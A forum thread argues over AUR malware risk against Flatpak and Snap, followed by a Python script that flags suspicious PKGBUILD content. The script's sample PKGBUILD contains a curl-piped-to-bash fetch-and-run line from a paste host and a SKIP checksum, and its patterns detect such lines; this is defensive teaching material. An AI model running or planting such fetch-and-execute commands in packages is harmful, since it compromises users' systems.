And others… https://lemdro.id/post/25813192
Man that’s why I don’t use Arch. It’s the wild west.
In seeking to have all the latest bleeding edge software updates, you end up with malware like this because nobody has time to properly check anything.
Most all the major distros have a way to install things outside of the project’s official repos. And this is a “people didn’t look at the PKGBUILD” issue, nothing to do with “bleeding edge” FUD.
This has been an issue with other distros in the past.
AUR is kinda the wild west. But also, in today’s cybersecurity climate, you really shouldn’t expect zero vulnerabilities. You should, however, expect prompt reporting of incidents. If you believe that no news is good news, then you’re burying your head in the sand.
That’s a good point.
The same can be said with flatpaks.
Let me reply again to your comment.
The same cannot be said of flatpaks. AUR stands for Arch User Repo, which is a user-driven unofficial package source. Flatpak on the other hand has some official channels for certain software applications like Firefox for example.
Now I’ve never used Arch or AUR, so correct me if I’m wrong, but I don’t think AUR has official software channels like flatpak does. Right?
If I’m right, flatpak definitely is a lot safer than AUR. As long as you don’t download your flatpaks from unofficial channels. This is actually a good advantage for Snaps which are thoroughly checked by Canonical.
Plus packages are manually inspected to ensure they meet Flathub’s packaging requirements.
~~Absolutely.~~
Actually, no. On second thought, let me reply again so you can see my new answer.
Just be aware of what you are installing. And do your best to audit your system regularly. Switching to a bleeding edge distro, and using the AUR, absolutely comes with risks. But it is up to the user to be aware of what they are installing. This goes for any OS. Be aware of what you are installing.
This can happen on any OS if you install software willy-nilly with no thought behind it.
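Since the thread's point is that nobody read the PKGBUILD, here is an added example (not from the thread or from any Arch tooling) of the static checks a user can run on a PKGBUILD's text before handing it to makepkg: sources hosted somewhere other than the upstream named in `url=`, checksums set to `SKIP`, and shell in the build functions that fetches or decodes and executes code. The sample PKGBUILD is constructed for the example and the patterns are heuristics, not a verdict.

```python
import re
from urllib.parse import urlparse

# Constructed sample PKGBUILD (not from the thread or any real AUR package),
# built to contain the things a reviewer should notice before running makepkg.
SAMPLE_PKGBUILD = r"""
pkgname=example-tool
pkgver=1.2.0
url="https://github.com/example/example-tool"
source=("https://github.com/example/example-tool/archive/v$pkgver.tar.gz"
        "helper.sh::https://paste.example.net/raw/abc123")
sha256sums=('0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef'
            'SKIP')
package() {
  install -Dm755 "$srcdir/example-tool" "$pkgdir/usr/bin/example-tool"
  curl -s https://paste.example.net/raw/post | bash
}
"""

# Heuristic patterns in build()/package()/prepare() bodies that deserve a second look.
SUSPICIOUS = {
    "pipe-to-shell": re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|da)?sh\b"),
    "base64-decode": re.compile(r"base64\s+(-d|--decode)"),
    "eval": re.compile(r"\beval\b"),
}

def review_pkgbuild(text: str) -> list[str]:
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings = []
    url = re.search(r'^url=["\']?([^"\'\n]+)', text, re.M)
    upstream = urlparse(url.group(1)).hostname if url else None
    # 1. Every source URL should live on the upstream host named in url=.
    src = re.search(r"^source=\((.*?)\)", text, re.M | re.S)
    for link in re.findall(r"https?://[^\s\"')]+", src.group(1) if src else ""):
        host = urlparse(link).hostname
        if upstream and host != upstream:
            findings.append(f"source from non-upstream host {host}: {link}")
    # 2. SKIP disables makepkg's integrity check for that source entirely.
    sums = re.search(r"^(?:md5|sha1|sha256|sha512|b2)sums=\((.*?)\)", text, re.M | re.S)
    skipped = sums.group(1).count("SKIP") if sums else 0
    if skipped:
        findings.append(f"{skipped} checksum(s) set to SKIP")
    # 3. Shell that makepkg runs as your user and that fetches/decodes then executes code.
    for name, pat in SUSPICIOUS.items():
        for m in pat.finditer(text):
            line = text[:m.start()].count("\n") + 1
            findings.append(f"{name} on line {line}: {m.group(0).strip()}")
    return findings
```

Run `review_pkgbuild(open("PKGBUILD").read())` on a downloaded PKGBUILD; anything it flags is a reason to read that line yourself before building.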